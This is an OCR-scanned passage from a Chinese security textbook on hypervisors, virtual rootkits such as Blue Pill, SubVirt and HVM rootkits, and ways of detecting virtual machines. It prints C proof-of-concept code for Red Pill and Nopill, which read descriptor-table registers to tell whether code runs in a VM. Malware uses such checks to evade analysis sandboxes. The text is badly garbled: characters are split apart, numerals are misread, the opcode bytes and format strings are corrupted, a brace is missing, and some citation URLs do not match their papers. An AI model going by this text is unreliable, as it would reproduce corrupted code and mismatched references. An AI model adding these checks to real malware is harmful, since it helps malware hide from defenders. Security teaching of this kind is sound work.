序 由 主 操作 系统 之 上 的 软件 实现 。 从 图 5-2 中 可 以 看 到 ， 川 类 系统 管理 程序 具有 与 操作 系统 同 级 别 的 内 核 模 式 组 件 ， 这 些 组 件 负 
责 将 虚拟 机 与 主 操作 系统 隔离 。 这 些 系统 管理 程序 提供 硬件 仿真 服务 ， 所 以 虚拟 机 认为 自己 直接 使 用 物理 硬件 。1| 类 系统 管理 程 
序 包括 Xen ESX Server、VMWare Workstation 和 Sun VirtualBox 等 著名 产品 。 


| 类 系统 管理 程序 如 图 5-3 中 所 示 ， 运 作 于 操作 系统 之 下 的 一 个 特殊 特权 级 别 Ring1。 这 种 系统 管理 程序 的 另 一 个 名 称 为 裸 金 
属 系统 管理 程序 (bare-metal hypervisors，) ， 这 是 因为 它们 依赖 于 制造 商 在 硬件 中 提供 的 虚拟 化 支持 (以 特殊 的 寄存 器 及 电 
路 的 方式 ) 以 及 CPU 中 的 特殊 指令 。| 类 系统 管理 程序 一 般 速度 更 快 ， 这 是 因为 虚拟 化 支持 嵌入 到 硬件 中 。| 类 系统 管理 程序 的 例 
子 包括 Citrix Xen Server、Microsoft Hyper-V 和 VMware vSphere。 图 5-3 是 | 类 硬件 管理 程序 的 总 体 图 解 。 
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图 5-2 了 I 类 系统 管理 程序 


这 不 能 代表 所 有 的 | 类 系统 管理 程序 实现 ， 因 为 具体 的 供应 商 解决 方案 都 需要 几 十 张 图 解 。 


| 类 系统 管理 程序 的 总 体 思路 是 压缩 保护 层次 ， 这 样子 虚拟 机 可 以 像 主 虚拟 机 一 样 在 硬件 之 上 运行 。 虚 拟 机 隔离 和 系统 完整 
性 由 系统 管理 程序 和 主 虚 拟 机 之 间 的 特殊 通信 维护 。 如 图 5-3 所 示 ， 系 统管 理 程序 由 来 自 Intel 或 者 AMD 的 硬件 级 别 虚拟 化 支持 
提供 支撑 环境 。 
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图 5-3 I 类 系统 管理 程序 


系统 管理 程序 是 虚拟 技术 中 最 重要 的 组 件 。 它 运行 于 所 有 单独 的 客户 操作 系统 之 下 ， 确 保 系统 的 完整 性 。 系 统管 理 程序 必须 
维持 客户 操作 系统 认为 自己 与 系统 硬件 直接 交互 的 假象 。 这 种 需求 对 虚拟 技术 来 说 是 关键 性 的 ， 也 是 计算 机 安全 界 中 许多 论战 的 
根源 。 


围绕 系统 管理 程序 无 法 保持 对 附属 操作 系统 的 透明 和 隔离 的 问题 已 经 激 起 了 很 多 争论 。 现 在 ， 计 算 机 安全 社区 已 经 广泛 地 接 
受 了 系统 管理 程序 可 能 无 法 保持 完整 的 虚拟 假象 ， 客 户 操作 系统 (或 者 安装 的 应 用 程序 ) 始终 能 够 确定 自己 是 否 处 于 虚拟 环境 中 
的 现实 。 尽 管 AMD 和 Intel 努 力 提 供 具 有 更 好 地 躲避 研究 团体 发 布 的 检测 技术 能 力 (例如 定时 攻击 和 专门 的 CPU 指令 ) 的 系统 管 
理 程 序 ， 但 是 前 述 的 事实 仍 未 改变 。 


5.1.3 ”虚拟 化 策略 


当今 的 虚拟 化 技术 所 使 用 的 虚拟 化 策略 主要 有 3 种 。 这 些 策略 在 与 操作 系统 和 底层 硬件 的 集成 方面 有 根本 的 不 同 。 


第 一 种 策略 被 称 为 虚拟 机 仿真 ， 要 求 系 统管 理 程序 仿真 真实 和 虚拟 的 硬件 供 客户 操作 系统 使 用 。 系 统管 理 程序 负责 将 客户 操 
作 系 统 所 能 访问 的 虚拟 硬件 “映射 ”到 计算 机 上 安装 的 真实 硬件 。 仿 真 的 关键 要 求 是 确保 必要 的 特权 级 可 用 并 且 在 客户 操作 系统 
必须 使 用 CPU 特权 指令 时 进行 验证 ， 这 种 仲裁 由 系统 管理 程序 处 理 。 使 用 仿真 技术 的 产品 包括 VMWare、Bochs、Parallels、 
QEMU 和 Microsoft Virtual|PC。 这 种 技术 的 关键 点 在 于 要 求 系统 管理 程序 “愚弄 ”客户 操作 系统 ， 使 其 以 为 正在 使 用 真实 硬 
件 。 


第 二 种 策略 被 称 为 半 虚 拟 化 (paravirtualitation) 。 这 种 策略 依赖 修改 客户 操作 系统 对 虚拟 化 提供 内 部 支持 。 这 样 就 不 需 


要 系统 管理 程序 对 特殊 的 CPU 指令 进行 “仲裁 ” ， 也 不 需要 “ 思 弄 ”客户 操作 系统 。 实 际 上 ， 客 户 操作 系统 知道 它们 正 处 于 虚 
拟 环境 中 ， 因 为 它们 正在 协助 虚拟 化 进程 。 实 现 这 一 策略 的 流行 产品 之 一 是 Xxen 和 Oracle VivturalBox。 


最 后 一 种 策略 是 Os 级 虚拟 化 ， 这 种 策略 中 操作 系统 完全 管理 隔离 和 虚拟 化 ， 实 际 上 它 建 立 了 本 身 的 多 个 副本 并 且 互 相隔 


。 这 种 技术 的 最 佳 范例 是 Oracle Solaris zones, 


Hot 


理解 这 3 种 策略 对 于 体会 虚拟 Rootkit 如 何 利用 每 种 实现 策略 的 复杂 性 来 说 是 重要 的 。 记 住 ， 这 些 策略 只 是 流行 的 虚拟 化 策 
略 。 在 商业 界 、 研 究 团 体 和 政府 机 构 中 还 存在 许多 其 他 的 策略 。 每 种 实现 都 为 虚拟 战线 带 来 自己 独特 的 优点 和 弱点 。 


514 ”虚拟 内 存 管理 


系统 管理 程序 负责 将 物理 硬件 抽象 为 虚拟 的 可 用 硬件 的 一 个 重要 实例 是 虚拟 内 存 管理 。 虚 拟 内 存 不 是 虚拟 化 中 独 有 的 概念 。 
所 有 现代 操作 系统 都 利用 物理 内 存 到 虚拟 内 存 的 抽象 ， 这 样 做 系统 能 够 支持 可 伸缩 的 多 进程 (一 次 运行 多 个 进程 ) 。 例 如 ， 所 有 
运行 在 32 位 的 非 PAE Windows NT 平台 上 的 进程 都 得 到 2GB 的 虚拟 内 存 。 但 是 ， 系 统 可 能 只 安装 了 512MB 物 理 RAM。 为 了 使 这 
种 “超额 使 用 ”成 为 可 能 ， 操 作 系统 的 内 人 存 管理 器 与 写 入 磁盘 的 一 个 页 面 文件 协同 ， 将 进程 的 虚拟 地 址 空间 翻译 为 物理 地 址 。 同 
样 的， 系统 管理 程序 必须 将 客户 操作 系统 使 用 的 底层 物理 地 址 转换 为 硬件 中 的 实际 物理 地 址 。 因 此 ， 管 理 内 存 时 就 需要 一 个 附加 
的 抽象 层 。 


虚拟 内 存 管理 器 是 虚拟 化 设计 的 一 个 关键 组 件 ， 不 同 的 供应 商 采 用 不 同 的 方法 来 管理 系统 内 存 。VMWare 将 主 操作 系统 的 
内 存 地 址 空间 与 属于 客户 操作 系统 的 分 开 ， 这 样 客户 操作 系统 不 可 能 接触 到 主 操作 系统 中 的 地 址 。 其 他 的 解决 方案 则 采用 硬件 和 
软件 解决 方案 相 结合 的 方法 来 管理 内 存 分 配 。 最 后 ， 这 些 解决 方案 只 能 有 限 地 防御 能 够 危害 客户 和 主 操作 系统 之 间隔 离 的 高 级 
Rootkit。 


5.1.5 ”虚拟 机 隔离 


系统 管理 程序 的 男 一 个 关键 职责 是 使 客户 操作 系统 相互 隔离 。 一 个 虚拟 机 使 用 的 任何 文件 或 者 内 存 空间 都 不 应 该 可 见于 任何 
其 他 虚拟 机 。 用 于 完成 这 一 分 隔 的 技术 和 组 件 统称 为 虚拟 机 隔离 。 系 统管 理 程序 运行 于 所 有 客户 操作 系统 之 下 及 /或 裸 硬 件 之 
上 ， 所 以 它 能 够 拦截 对 系统 资源 的 请 求 并 且 控 制 可 见 性 。 虚 拟 内 存 管理 和 I/O 请 求 中 介 对 于 隔离 YM 是 必要 的 ， 指 令 集 仿真 和 特 
权 扩 大 控制 (例如 SYSENTER， 调 用 门 等 ) 也 是 如 此 。VM 隔 离 还 隐 含 了 客户 操作 系统 与 主 操作 系统 的 隔离 。 这 种 分 离 对 于 集成 
性 、 稳 定性 和 性 能 都 是 天 键 的 ， 结 果 是 虚拟 技术 相当 擅长 于 单独 客户 操作 系统 之 间 的 保护 。 你 很 快 就 会 看 到 ， 在 底层 的 主 操作 系 
统 与 从 属 的 客户 操作 系统 之 间 的 保护 就 不 是 如 此 。 前 面 已 经 提 到 过 ， 业 界 中 已 经 普遍 接受 了 一 个 事实 ， 虚 拟 技术 不 能 维持 “真实 
世界 ”和 “虚拟 世界 ”之 间 的 界线 。 


5.2 ”虚拟 机 Rootkit 技 术 


现在 我 们 将 把 焦点 从 虚拟 化 技术 转移 到 3 种 虚拟 Rootkit 如 何 利用 这 一 技术 上 来 。 首 先 ， 让 我 们 简单 地 回顾 一 下 历史 ， 看 看 恶 
意 软 件 在 这 方面 是 如 何 发 展 的 。 


5.2.1 ”和 矩阵 中 里 的 Rootkit :我 们 是 怎么 到 这 里 的 


虚拟 技术 已 经 成 为 全 新 一 代 的 恶意 软件 和 Rootkit 的 分 水 岭 。 在 第 4 章 中 ， 我 们 介绍 了 Joanna Rutkowska 定 义 的 恶意 软件 分 
类 。 为 了 便于 展开 恶意 软件 和 Rootkit 发 展 的 讨论 并 且 抵 御 这 些 威胁 ， 我 们 将 使 用 Joanna 的 模型 所 摘 述 的 4 种 恶意 软件 的 成 熟 度 


水 平 ， 将 其 应 用 到 Rootkit : 
0 类 /用 户 模 式 Rootkit 不 成 熟 。 
` | 类 /静态 内 核 模式 Rootkit 较为 成 熟 但 是 容易 发 现 。 
| 类 /动态 内 核 模式 Rootkit 成 熟 但 是 始终 处 于 与 检测 程序 相同 的 水 平 。 
川 类 /虚拟 Rootkit 高 度 成 熟 并 且 不 断 演变 。 


我 们 看 到 Rootkit 和 恶意 软件 的 总 体 趋势 (也 为 刚才 所 描述 的 恶意 软件 分 类 所 证 明 ) 是 随 着 技术 变 得 更 加 成 熟 ， 进 攻 和 防御 
的 安全 度量 也 都 有 了 发 展 。 这 意味 着 ， 防 御 者 为 了 发 现 Rootkit 需 要 更 加 努力 地 工作 ， 而 Rootkit 创 作者 也 必须 更 加 努力 地 编写 更 
成 熟 的 Rootkit。 这 种 战斗 造成 的 部 分 结果 是 技术 集合 中 不 断 增 长 的 复杂 性 (也 就 是 虚拟 化 ) ， 这 也 是 恶意 软件 创作 者 和 计算 机 
防御 人 员 之 间 不 断 斗 争 的 直接 结果 。 在 分 类 中 ， 每 种 类 型 的 恶意 软件 可 以 看 作 一 代 恶 意 软件 ， 它 们 需要 找 更 好 的 传染 方法 以 获得 
成 长 。 目 前 尖端 的 Rootkit 创 作 和 检测 技术 就 是 虚拟 化 。 


斗争 还 在 持续 ，Rootkit 扩 大 到 虚拟 世界 和 人 类 为 真正 察觉 虚拟 Rootkit 的 努力 与 电影 《黑客 帝国 》 中 的 情节 类 似 。2006 
年 ，Joanna Rutkowska 发 布 了 一 个 名 为 Blue Pil 的 虚拟 Rootkit。 这 个 Rootkit 得 名 于 电影 中 的 蓝 色 药 片 (blue pill) ， 这 是 影 
片 中 当 Neo 面 临 重 新 进入 和 矩阵 (保持 对 现实 世界 的 无 知 ) 或 者 服 下 红色 药片 离开 虚拟 世界 进入 真实 世界 的 选择 时 ，Morpheus 所 
提供 的 (Joanna 还 发 布 了 一 个 发 现 虚 拟 环境 的 工具 ， 恰 当地 命名 为 Red PIN 。 与 电影 的 情节 类 似 ， 受 害 的 操作 系统 “ 知 服 了 蓝 
色 药 片 ” (也 就 是 虚拟 Rootkit) ， 现 在 处 于 “矩阵 ”之 中 ， 这 是 受到 虚拟 机 控制 的 世界 。 相 应 地 ，Red Pil 能 够 发 现 虚拟 环境 ; 
但 是 这 个 类 比 还 有 不 足 之 处 ， 因 为 这 个 工具 不 能 使 OS 离 开 VM (就 像 红 色 药 片 使 Neo 离 开 和 矩阵 那样 ) 。 


虚拟 化 的 安全 合 义 已 经 经 过 了 一 段 时 间 的 研究 ，Joanna 的 研究 向 主流 的 研究 团体 提出 了 问题 ， 在 此 之 后 已 经 发 布 了 许多 工 


具 和 研究 报告 。 


5.2.2 ”什么 是 虚拟 Rootkit 


虚拟 Rootkit 是 专门 为 虚拟 环境 编码 和 设计 的 Rootkit。 它 的 目标 与 我 们 在 本 书 中 已 经 讨论 过 的 传统 Rootkit 相 同 (也 就 是 使 
用 隐蔽 的 手段 在 机 器 上 存续 ) ， 其 组 件 也 大 体 相同 ， 但 是 技术 完全 不 同 。 主 要 的 不 同 在 于 这 种 Rootkit 的 目标 已 经 从 直接 修改 操 
作 系 统 转移 到 在 虚拟 环境 中 透明 地 破坏 系统 。 简 而 言 之 ， 虚 拟 Rootkit 包 含 检测 和 选择 性 地 离开 虚拟 环境 的 功能 (如 果 它 不 属于 
客户 VM) ， 同 样 也 能 通过 在 虚拟 环境 之 下 安装 恶意 的 系统 管理 程序 ， 完 全 劫持 原生 (E) 操作 系统 。 


虚拟 Rootkit 将 战场 从 操作 系统 的 同一 级 别 转移 到 操作 系统 之 下 的 级 别 〈 因 此， 它 是 前 面 讨论 过 的 3 类 恶意 软件 ) 。 传 统 的 
Rootkit 必 须 确 定 隐蔽 地 在 不 为 人 知 的 情况 下 (并且 不 触发 第 三 方 检测 工具 ) 修改 操作 系统 的 方式 ， 而 虚拟 Rootkit 在 完全 不 必 触 
及 操作 系统 的 情况 下 达到 了 目的 ， 它 利用 了 软件 和 硬件 的 虚拟 化 支持 将 自身 插入 操作 系统 之 下 。 


5.2.3 ”虚拟 Rootkit 的 类 型 


从 本 书 的 目的 出 发 ， 我 们 将 定义 3 种 虚拟 Rootkit 类 型 (最 后 两 种 定义 已 经 为 安全 社区 中 的 其 他 研究 人 员 所 定义 ) : 


: 虚拟 感知 恶意 软件 (Virtualization-aware malware, VAM) 这 是 你 所 常见 的 恶意 软件 ， 增 加 了 检测 虚拟 环境 的 功 


能 ， 从 而 有 不 同 的 表现 (终止 、 暂 停 ) 或 者 攻击 VM 本 身 。 


- 基于 虚拟 机 的 Rootkit (VMBR) ”这 是 一 种 传统 类 型 的 Rootkit， 具 备 在 不 为 人 知 的 情况 下 在 虚拟 机 内 部 封装 原生 OS 的 能 
力 ， 这 种 能 力 通过 修改 现 有 的 虚拟 化 软件 来 得 到 。 


. 系统 管理 程序 虚拟 机 (Hypervisor virtual machine, HVM) Rootkit 这 种 Rootkit 利 用 硬件 虚拟 化 支持 ， 用 定制 的 系统 
管理 程序 完全 替代 底层 系统 管理 程序 ， 然 后 在 运行 中 封装 当前 运行 的 操作 系统 ( 主 操作 系统 和 客户 操作 系统 ) © 


虚拟 感知 恶意 软件 更 多 的 是 个 令 人 烦恼 的 东西 而 不 是 真正 的 威胁 。 这 种 类 型 的 恶意 软件 只 是 在 检测 到 虚拟 环境 时 改变 自己 的 
行为 ， 例 如 ， 终 止 自己 的 进程 或 者 暂停 执行 ， 就 像 没 有 恶意 的 目的 一 样 。 许 多 常见 的 病毒 、 蠕 虫 和 木马 都 可 以 归 入 这 个 类 别 。 这 


软件 能 够 肚 避 未 起 疑心 的 分 析 人 员 。 使 用 调试 程序 可 以 轻松 地 战胜 这 种 技术 ， 因 为 分 析 人 员 能 够 禁用 这 种 多 态 行 为 ， 并 发 现 恶 意 
软件 的 真正 功能 。 密 缸 也 常常 用 作 沙 箱 来 分 析 恶 意 软 件 以 及 浓缩 运行 多 个 “ 轻 量 级 ”的 VM 所 需 的 资源 ; 因此 ， 虚 拟 感知 的 恶意 
软件 也 常常 有 意 无 意 地 将 它们 作为 目标 。 


VMBR 最 先 由 Tal Garfinkel, Keith Adams，、Andrew Warfield 和 Jason Franklin 在 斯 坦 福 大 学 定义 
(http://www.cs.cmu.edu/~jfrankli/hotosO7/vmm_detection hotos07.pdf) ， 包 含 能 够 通过 修改 系统 自 举 顺序 指向 
Rootkit 的 系统 管理 程序 将 主 OS 移 入 VM ， 系 统管 理 程序 由 目标 OS 中 的 一 个 秘密 的 内 核 驱动 程序 装 入 。 本 书 中 举 出 的 例子 是 
SubVirt， 它 需要 一 个 修改 过 的 VMWare 或 者 Virtual PC 版 本 才能 运行 。 操 作 系统 本 身 一 一 Windows XP 和 Linux 一 一 也 做 了 修 
改 以 建立 这 个 概念 验证 性 的 Rootkit。VMBR 在 设计 和 功能 上 比 VAM 更 成 熟 ， 但 是 仍然 缺乏 HVM Rootkit 的 自治 能 力 和 超 强 的 隐 
蔽 性 ， 它 还 存在 着 由 于 原生 的 x86 体 系 结构 中 缺乏 完全 虚拟 化 所 致 的 固有 缺陷 。 这 意味 着 很 多 CPU 指令 (sgdt、sidt、sldt、 
popf、mov 等 ) 不 会 被 系统 管理 程序 所 捕捉 ， 可 以 在 用 户 模式 中 执行 这 些 指令 以 检测 VMBR。 因 为 这 些 指令 没有 被 Intel 看 作 特 
权 指 令 ，CPU 不 会 为 这 些 有 问题 的 指令 设置 陷阱 。 因 此 ， 仿真 软 件 (如 VMBR) 也 就 不 能 拦截 这 些 可 能 揭露 VMBR 存 在 的 指令 。 


HVM Rootkit 是 现在 已 知 的 最 高 级 的 虚拟 Rootkit。 它 们 能 够 安装 一 个 定制 的 超 轻 量 级 系统 管理 程序 ， 这 个 程序 能 在 运行 中 
(也 就 是 说 ， 对 OS 本 身 是 透明 的 ) 在 VM 中 寄生 一 个 原生 OS， 而 且 这 种 行为 极其 隐蔽 。HVM 虚 拟 Rootkit 依 赖 AMD 和 Intel 所 提 
供 的 硬件 虚拟 化 支持 来 达到 它 的 目标 。 硬 件 支 持 以 软件 (例如 OS 或 者 HVM Rootkit) 所 能 运行 的 附加 CPU 级 别 指 令 的 形式 提 
供 ， 这 些 指令 能 够 快速 而 有 效 地 安装 一 个 系统 管理 程序 ， 并 且 在 隔离 的 虚拟 环境 中 运行 客户 操作 系统 。 


在 安全 团体 中 争论 的 要 点 是 主 操作 系统 (或 者 底层 系统 管理 程序 ) 能 否 发 现 这 个 子 版 本 (或 者 检测 是 否 与 将 来 可 能 被 虚拟 化 
的 所 有 系统 相关 ) 。 现 在 ， 我 们 来 讨论 虚拟 恶意 软件 如 何 检测 和 离开 虚拟 环境 。 


5.2.4 检测 虚拟 环境 


检测 虚拟 环境 是 恶意 软件 和 恶意 软件 检测 程序 的 重要 功能 。 想 象 一 下 : 如 果 你 在 “和 矩阵 ”当中 ， 你 不 想 知道 吗 ” 如 果 你 知道 
有 人 在 秘密 地 监视 着 你 的 一 举 一 动 ， 就 可 能 会 重新 思考 你 的 行动 。 

注意 : 本 章 中 的 危险 等 级 粗略 估计 了 所 讨论 的 技术 用 于 实际 的 恶意 软件 的 可 能 性 ， 即 使 该 技术 本 身 ( 例 如 VM 脱逃 ) 实际 上 
可 能 不 是 一 种 攻击 。 因 为 虚拟 Rootkit 不 太 常 见 ， 所 以 危险 等 级 非常 低 。 


金 测 VM 的 产物 


因为 虚拟 机 使 用 系统 资源 ， 所 以 它们 在 系统 的 各 处 留 下 表明 其 人 存在 的 痕迹 。 “挫败 虚拟 机 检测 ”一 文 
(http://handlers.sans.org/tliston/ThwartingVMDetection Liston Skoudis.pdf) 的 作者 描述 了 4 个 检查 虚拟 环境 标志 的 区 
域 : 


进程、 文件 系统 和 注册 表 中 的 产物 ， 例如 VMWare 系 统管 理 程序 进程 。 


* 系统 内 存 中 的 产物 。 内 存 中 通常 装 入 到 某 个 位 置 的 OS 结构 在 虚拟 化 时 可 能 被 装 入 到 不 同 的 位 置 ; 内 存 中 存在 表示 虚拟 管 


理 程序 正在 运行 的 字符 囊 。 


. 虚拟 机 使 用 的 虚拟 硬件 的 存在 ， 例 如 VMWare 的 虚拟 网 卡 和 USB 了 驱动 器 。 
: 专用 于 虚拟 化 的 CPU 指 令 ， 例 如 为 增加 虚拟 性 能 所 添加 的 非 标 准 x86 指 令 ， 如 Intel VT-x 的 VMXON/VMXOFF。 


搜索 这 些 产物 ， 恶 意 软 件 和 VM 检 测 程序 都 能 发 现 自己 处 于 虚拟 环境 中 。 
VM 异常 和 透明 性 


尽管 检测 方法 有 用 ,但 是 深究 之 下 ， 根 本 的 问题 是 虚拟 机 无 法 做 到 透明 。 虚 拟 化 技术 的 根本 目标 是 透明 地 仿真 底层 硬件 。 换 
名 话说， 客户 操作 系统 应 该 不 会 因为 性 能 和 抽象 的 原因 而 意识 到 自己 处 于 虚拟 环境 之 中 。 但 是 ， 昌 然 透明 性 是 一 个 性 能 目标 ， 但 
是 达到 足够 好 的 透明 性 (例如 性 能 不 会 因为 仿真 而 受到 影响 ) 也 仅仅 是 一 个 目标 。 换 名 话说， 虚拟 机 从 未 计划 ， 也 可 能 无 法 达到 
完全 透明 。 


这 里 还 有 个 问题 : 因为 虚拟 化 技术 本 身 是 可 检测 的 ， 任 何 使 用 或 者 依靠 这 种 技术 的 恶意 软件 或 者 检测 工具 对 其 对 手 来 说 也 都 
是 可 检测 的 ， 这 对 于 检测 程序 和 恶意 软件 来 说 是 个 双 输 的 局 面 。 如 果 检 测 程序 使 用 VM 分 析 恶 意 软件 ， 那 么 恶意 软件 总 是 会 发 现 
自己 在 VM 中 ; 同样 ， 如 果 庶 拟 Rootkit 试 图 通过 安装 自己 的 系统 管理 程序 在 虚拟 环境 中 为 主 操作 系统 设置 陷阱 ， 主 OS 也 总 是 可 
以 发 现 这 一 变化 。 


那么 什么 是 虚拟 环境 的 底层 标志 呢 ? 许多 标志 与 设计 问题 相关 一 一 例如 如 何 仿真 某 条 CPU 指令 一 但 是 大 部 分 都 是 系统 管 
理 程序 作为 “真实 硬件 ”和 “虚拟 硬件 ”之 间 的 代理 所 固有 的 物理 限制 和 性 能 问题 的 产物 。 


Garfinkel 等 人 在 《Compatibility ls Not Transparency: VMM Detection Myths and Realities) (兼容 性 不 是 透明 性 : 
VMM 检 测 的 神话 和 现实 ) (http://handlers.sans.org/tliston/Thwarting VMDetection Liston Skoudis.pdf) 一 文中 提供 了 
对 这 种 虚拟 化 异常 的 非常 好 的 总 结 一 一 逻辑 差异 、 资 源 差 异 和 定时 差异 。 


逻辑 差异 是 CPU 制造 商 (Intel, AMDE) 的 真正 x86 指 令 集 与 虚拟 化 提供 商 如 VMware 或 者 Virtual PC 之 间 的 实现 差异 。 这 
种 差异 很 简单 : 为 了 仿真 硬件 ，VMWare 和 Microsoft 这 类 公司 必须 “推倒 重 来 ”， 但 是 它们 不 是 总 能 沿 着 正确 的 道路 前 进 ， 而 
是 用 不 同 的 途径 达到 目的 。 因 此 ， 区 别 它们 的 实现 和 真正 的 x86 支 持 并 不 困难 。 目 前 VM 仿真 x86SIDT 指 令 的 局 限 性 就 是 一 个 例 
子 。 


资源 差异 在 虚拟 环境 中 很 明显 ， 这 是 因为 虚拟 机 和 系统 管理 程序 本 身 必 须 消耗 资源 。 这 些 差 异 主 要 表现 在 CPU 缓存 、 主 内 
存 以 及 硬盘 空间 。 常 用 的 一 种 VM 检测 技术 包含 了 对 非 虚 拟 化 环境 的 存储 需求 的 基准 测试 ， 使 用 所 有 与 基准 的 背离 来 作为 虚拟 环 


境 的 标志 。 


对 于 第 三 种 VM 异常 一 一 时 间 差 异 也 可 以 利用 相同 的 技术 。 在 非 虚拟 化 操作 的 约束 下 ， 某 些 系统 指令 的 执行 时 间 是 可 以 预测 
的 。 在 仿真 的 时 候 ， 这 些 相同 的 指令 人 花费 的 时 间 要 稍微 长 一 些 ， 而 这 种 差异 很 容易 检测 到 。 前 面 提 到 的 Garfinkel 等 人 的 文章 中 
有 一 个 例子 ， 由 于 系统 管理 程序 的 虚拟 内 人 存 管理 器 处 理 不 断 增加 的 页 面 错误 ， 所 以 系统 性 能 有 根本 性 的 问题 。 这 些 页 面 错误 就 是 
虚拟 机 实施 像 VM 隔 离 (就 是 保证 主 操作 系统 与 客户 操作 系统 的 内 存 空间 不 互相 影响 ) 这 类 的 重要 特性 时 的 管理 开销 的 直接 结 
果 。 有 一 种 用 于 检测 VM 的 时 间 攻 击 方法 就 涉及 了 并 行 执行 两 条 x86 指 令 (CPUID 和 NOP) ， 在 一 段 时 间 内 度量 执行 时 间 的 差 
异 。 大 部 分 VM 技术 会 有 可 以 预测 的 差异 范围 ， 而 非 虚 拟 化 环境 则 没有 差异 。 


现在 我 们 将 研究 一 些 可 用 于 检测 虚拟 环境 存在 的 工具 。 除 非 另 作 说明， 否则 这 些 工 具 只 能 检测 VMWare 和 Virtual PC, VM 
检测 方法 的 更 全 面 列表 包括 Parallels、Bochs、Hydra 以 及 其 他 许多 种 方法 ， 可 以 参见 


http://www.symantec.com/avcenter/reference/Virtual Machine Threats.pdf。 





在 VMWare 和 “真实 ”主机 内 部 测试 Sucklt Rootkit 中 观察 到 一 些 异常 之 后 ，Red Pil 由 Joanna Rutkowska 于 2004 年 发 布 
(http://www.invisiblethings.org/papers/redpill.html) 。 事 实 是 ， 这 个 Rootkit (S|IDTHHW) 在 VMWare 中 无 法 装 入 ， 这 
归咎 于 VMWare 对 SIDT 指 令 (存储 IDT) 的 处 理 方式 。 因 为 一 个 VM 中 能 够 运行 多 个 操作 系统 ， 而 发 出 SIDT 时 只 有 一 个 1DT 寄 存 
器 能 够 存储 IDT， 所 以 VM 必须 将 1DT 交 换 出 去 ， 将 其 中 一 个 1DT 存 储 在 内 存 中 。 尽 管 这 破坏 了 Rootkit 的 功能 ， 但 是 却 偶然 地 揭示 
了 VM 中 许多 古怪 现象 中 的 一 种 ， 这 种 现象 使 VM 很 容易 检测 ;Red Pill 也 就 应 运 而 生 。 


Red Pil 在 VM 中 发 出 SIDT 指 令 并 且 测 试 返 回 的 1DT 地 址 ， 并 与 Virtual PC 和 和 VMWare Workstation 中 的 已 知 值 相 比 。 根 据 
返回 值 ，Red Pill 能 够 检测 是 否 在 VM 内部。 下列 代 码 完全 使 用 C 语 言 编 程 : 


#include <stdio.h> 


int main () { 
unsigned char m[2+4], rpill[] = "\x0f£\x01\x0d\x00\x00\x00\x00\xc3"; 
* ((unsigned*) &rpill[3]) = (unsigned)m; 
((void(*) ())&rpill) (); 


printf ("idt base: %#x\n", *((unsigned*) &m[2])); 


if (m[5]>0xd0) 
printf ("Inside Matrix!\n", m[5]) ; 


else 
printf ("Not in Matrix.\n") ; 


return 0; 


} 
注意 ，SIDT 指 令 以 十 六 进 制 操作 码 (CPU 指令 和 操作 数 的 字 节 表示 ) 的 形式 包含 在 源 代码 中 ， 以 增加 其 可 移植 性 。 为 了 使 
编译 器 为 你 生成 这 些 操 作 码 ， 只 要 使 用 内 联 汇编 代码 (例如 ，MOV eax, 4) 来 代 蔡 操作 码 就 可 以 了 。 


ô Danny Quist 和 Val Smith (Offensive Computing) 创建 的 Nopill: 使 用 SLDT 的 逻辑 差异 





Red Pi 发 布 后 不 久 ，Offensive Computing 的 两 位 研究 人 员 注 意 到 它 所 采用 的 方法 有 重大 的 局 限 性 ， 进 而 发 布 了 白皮书 以 
及 改进 的 概念 验证 代码 Nopill (http://www.offensivecomputing.net/files/active/0/vm.pdf) 。 这 一 局 限 性 就 是 SIDT 方 法 在 
多 核 以 及 多 处 理 器 的 系统 上 会 失败 ， 因 为 每 个 处 理 器 都 有 一 个 IDT， 生 成 的 字 节 特征 码 可 能 剧烈 变化 (从 而 使 Red Pill 使 用 的 硬 
编码 值 变 得 不 可 靠 ) 。Red Pill 对 于 非 虚拟 化 的 多 处 理 系 统 也 会 遇 到 假 阳性 的 情况 。 


这 两 位 研究 人 员 的 改进 方法 是 使 用 x86 局 部 描述 符 表 (LDT) ， 这 是 一 个 与 进程 相关 的 用 于 内 存 访 问 保护 的 数据 结构 ， 目 标 
与 1DT 相 同 。 通 过 发 出 SLDT 指 令 ，Nopill 能 够 更 可 靠 地 在 多 处 理 器 系统 上 检测 VM。Nopill 使 用 的 特征 码 是 根据 Windows OS 不 
利用 LDT (所 以 其 位 置 将 是 0x00) 以 及 GDT 结 构 这 一 事实 ， 而 VMWare 无 论 如 何 都 必须 为 LDT 和 GDT 提 供 虚 拟 支持 的 事实 。 
此 ,每 个 结构 的 位 置 在 虚拟 化 系统 和 非 虚拟 化 系统 上 都 会 有 可 预测 的 变化 。Nopill 的 代码 如 下 : 


#include <stdio.h> 
inline int idtCheck () { 
unsigned char m[6] ; 
_ asm sidt m; 
printf ("IDTR: %2.2x %2.2x $2.2x %2.2x %2.2x %2.2x\n", m[0], m[1], m[2], 
m[3], m[4], m[5]); 
return (m[5]>0xd0) ? 1 : 0; 
} 
int gdtCheck() { 
unsigned char m[6] ; 
_ asm sgdt m; 
printf ("GDTR: %2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", m[0], m[1], m[2], 
m[3], m[4], m[5]); 
return (m[5]>0xd0) ? 1 : 0; 
} 
int ldtCheck() { 
unsigned char m[6] ; 
__asm sldt m; 
printf ("LDTR: %2.2x %2.2x %2.2x %2.2x %2.2x %2.2x\n", m[0], m[1], m[2], 
m[3], m[4], m[5]); 
return (m[0] != 0x00 && m[1] != 0x00) ? 1: 0; 
} 


int main(int argc, char * argv[]) { 


idtCheck () ; 
gdtCheck () ; 
if (ldtCheck () ) 

printf ("Virtual Machine detected.\n"); 
else 

printf ("Native machine detected.\n"); 
return 0; 


如 源 代码 中 所 示 ，Nopill 实 际 上 读 取 所 有 的 IDT、GDT 和 LDT 结 构 ， 但 是 仅 将 LDT 作 为 VM 检测 的 依据 。 对 于 IDT 和 GDT 结 
构 ，Nopill 发 出 相关 的 x86 指 令 将 该 表 的 信息 存储 在 一 个 内 存 位 置 (SIDT 或 者 SGDT) 上 ， 然 后 检查 生成 的 表格 地 址 以 了 解 这 个 
地 址 是 否 大 于 魔法 地 址 位 置 0xd0 (虚拟 环境 中 可 预测 的 重 定位 表格 位 置 ) 。 然 后 读 取 LDT 确 定 代 码 是 否 在 VM 中 运行 。 如 果 两 个 
项 目 中 LDT 的 地 址 都 不 是 0x00， 那 么 VM 肯 定 重 定位 了 这 个 表格 ， 因 为 Windows 不 使 用 LDT (因此 地 址 为 0x00) 。 


6 Tobias Klein (Trapkit) 所 创建 的 gcoopyNG : 资源 和 逻辑 差异 





